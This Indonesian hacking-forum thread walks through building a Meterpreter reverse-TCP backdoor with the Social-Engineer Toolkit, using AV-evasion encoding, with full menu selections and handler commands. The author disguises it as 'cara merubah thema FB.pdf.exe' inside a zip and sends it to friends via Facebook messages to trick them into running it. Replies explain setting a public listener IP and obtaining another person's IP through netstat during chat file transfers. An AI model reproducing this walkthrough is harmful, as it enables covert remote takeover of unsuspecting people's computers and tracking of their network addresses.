cara backdoor dengan SET via modem (dial up)
#1
Tongue 
gini mas brow, waktu saia baca-baca artikel tentang tool SET, saia kepikiran untuk mencobanya, tapi.... karena baterai laptop saia lagi drop, jadi saia tidak praktek di jaringan Wifi, tapi saia paraktek dengan mengunakan dial up.

skenarionya begini mas brow
:: backdoor adalah suatu infeksi yang kita tanamkan kedalam komputer korban sehingga kita bisa meremote (rooting) komputer korban :: Smile

nah iseng-iseng saia buka tu konsole di backtrack 5 saia, dan saia ketik

root@bt:/pentest/exploits/set# ./set
-------------------------------------------------------------
Select from the menu:
1) Social-Engineering Attacks ------------> saia pilih ini
2) Fast-Track Penetration Testing
3) Third Party Modules
4) Update the Metasploit Framework
5) Update the Social-Engineer Toolkit
6) Help, Credits, and About

99) Exit the Social-Engineer Toolkit
set> 1
-------------------------------------------------------------
Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener ------------> saia pilih ini
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) SMS Spoofing Attack Vector
8) Wireless Access Point Attack Vector
9) Third Party Modules

99) Return back to the main menu.
set> 4
-------------------------------------------------------------
[!] ERROR:UPX packer not found in the pathname specified in config. Disabling UPX packing for executable! ============>> nah ini kenapa ya mas ??? Huh

What payload do you want to generate:

Name: Description:

1) Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker
2) Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker ---------> saia pilih ini
3) Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker
4) Windows Bind Shell Execute payload and create an accepting port on remote system
5) Windows Bind Shell X64 Windows x64 Command Shell, Bind TCP Inline
6) Windows Shell Reverse_TCP X64 Windows X64 Command Shell, Reverse TCP Inline
7) Windows Meterpreter Reverse_TCP X64 Connect back to the attacker (Windows x64), Meterpreter
8) Windows Meterpreter Egress Buster Spawn a meterpreter shell and find a port home via multiple ports
9) Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter
10) Windows Meterpreter Reverse DNS Use a hostname instead of an IP address and spawn Meterpreter
11) SE Toolkit Interactive Shell New custom interactive reverse shell designed for SET
12) RATTE HTTP Tunneling Payload Security bypass payload that will tunnel all comms over HTTP
13) ShellCodeExec Alphanum Shellcode This will drop a meterpreter payload through shellcodeexec (A/V Safe)
14) Import your own executable Specify a path for your own executable

set:payloads> 2
----------------------------------------------------------------------
Below is a list of encodings to try and bypass AV.

Select one of the below, 'backdoored executable' is typically the best.
1) avoid_utf8_tolower (Normal)
2) shikata_ga_nai (Very Good)
3) alpha_mixed (Normal)
4) alpha_upper (Normal)
5) call4_dword_xor (Normal)
6) countdown (Normal)
7) fnstenv_mov (Normal)
8) jmp_call_additive (Normal)
9) nonalpha (Normal)
10) nonupper (Normal)
11) unicode_mixed (Normal)
12) unicode_upper (Normal)
13) alpha2 (Normal)
14) No Encoding (None)
15) Multi-Encoder (Excellent)
16) Backdoored Executable (BEST) -----> saia pilih ini

set:encoding> 16
------------------------------------------------------------------
set:payloads> PORT of the listener [443]: ---> dan saia isikan 5555
------------------------------------------------------------------

dan proses pembuatan Backdoor sedang berlangsung, file backdoor akan terletak di directory /pentest/exploits/set dengan nama msf.exe, nah untuk menarik keingin tahuan si korban, saya rename menjadi (cara merubah thema FB.pdf.exe) dan saia rubah menjadi .zip ( karena fasilitas messages di FB tidak memperbolehkan mengirim file ber_extensi .exe Smile ) hehehehe.......

file backdoor tersebut saia kirimkan kepada teman-teman saia melalui fasilitas messages FB, dengan harapan mereka meng excute file yang saia kirimkan (sosial enginering) rasa ingin tahu manusia

nah kembali ke konsole saia

set> Start the listener now? [yes|no]: -----> saia pilih y
==================================================

[*] Processing src/program_junk/meta_config for ERB directives.
resource (src/program_junk/meta_config)> use exploit/multi/handler
resource (src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 0.0.0.0
LHOST => 0.0.0.0
resource (src/program_junk/meta_config)> set LPORT 5555
LPORT => 5555
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
msf exploit(handler) >
[*] Started reverse handler on 0.0.0.0:5555 --->> gimana agar hendler IP kita ?
[*] Starting the payload handler...
============================================================

ini dia masalahnya mas-mas..... setahu saia kita harus men set hendler agar sent back kepada IP kita, jika dilihat diatas handler nya 0.0.0.0 dengan port 5555

bisa g ya skenario yang ada di kepala saia ini terwujud, mohon temen-temen dapat membantu ....Confused

maaf panjang dan rumit, pengguna baru yang ingin tau mas.... hehehehe .... :badpc:

===================================
kekuranganku adalah tidak adanya kelebihan./
===================================

#2
coba LHOST nya diganti manual bro, ketika ditanya start listener now? jawab no, trus bikin msf handler sendiri, tapi inget hanya untuk ip publik saja klo kita ingin mendapatkan dari luar jaringan kita, dulu ane pake flash bisa soalnya dapet ip publik modemnya (pake hp jadul lagi hehe)

trus untuk yg UPX packer not found itu memang harus diinstall dulu, bisa download disini:
http://upx.sourceforge.net/

UPX itu untuk mengkompresi file executable, hampir sama seperti gzip, rar dkk tapi ini buat file executable, untuk lebih lengkapnya bisa dilihat di link diatas

#3
Ikut menyimak, dan membutuhkan tutor ini heheheh ...
klo provider SMART dapat IP_Publik nya dari mana?
Quote:SayapHitam@bt:~# apt-get install evil-package
SayapHitam@bt:~# === SAYAP HITAM was Installed ===

#4
(02-11-2012, 08:38 AM)calon.sarjana Wrote: Ikut menyimak, dan membutuhkan tutor ini heheheh ...
klo provider SMART dapat IP_Publik nya dari mana?

ip publik coba di traceroute, setelah ip internal kita seharusnya itu ip publik, contoh:
Quote: 1 <1 ms <1 ms 1 ms 192.168.10.1
2 <1 ms 1 ms 1 ms 192.168.1.1
3 30 ms 36 ms 25 ms 202.161.18.33 --> ip publik

atau buka ping.eu nanti diatasnya ada ip publik kita

#5
Saya pernah trace email orang yg make Modem Flash Telkomsel, nah jatuhnya dia tuh di jakarta padahal orangnya ada di sumatera, ngaruh ga itu? trus IP publik tuh bersifat permanent ke modemnya ga sih? maaph mas broo bnyak nanya soalnya awam masalah jaringan Tongue
Quote:SayapHitam@bt:~# apt-get install evil-package
SayapHitam@bt:~# === SAYAP HITAM was Installed ===

#6
ip public itu bukannya jatuhnya ke providernya..
ane pake Three,,ip modem 10.10.10 bla bla,,
ip public 202.bla bla,

beda kan
kalo mau dapat ip aslinya modem seseorang,,coba chatting dengan ym,,trus gunakan webcam/transfer file,,
gunakan netstat -a,, perhatikan aja,,kalao webcam portnya 5050,,ntar lihat ipnya,, ane pernah berhasil kok

#7
knp ane muncul kya gini ya:

Spoiler! :
[Image: snapshot2.png]
Tak Pernah Lelah untuk terus Belajar








Users browsing this thread: 1 Guest(s)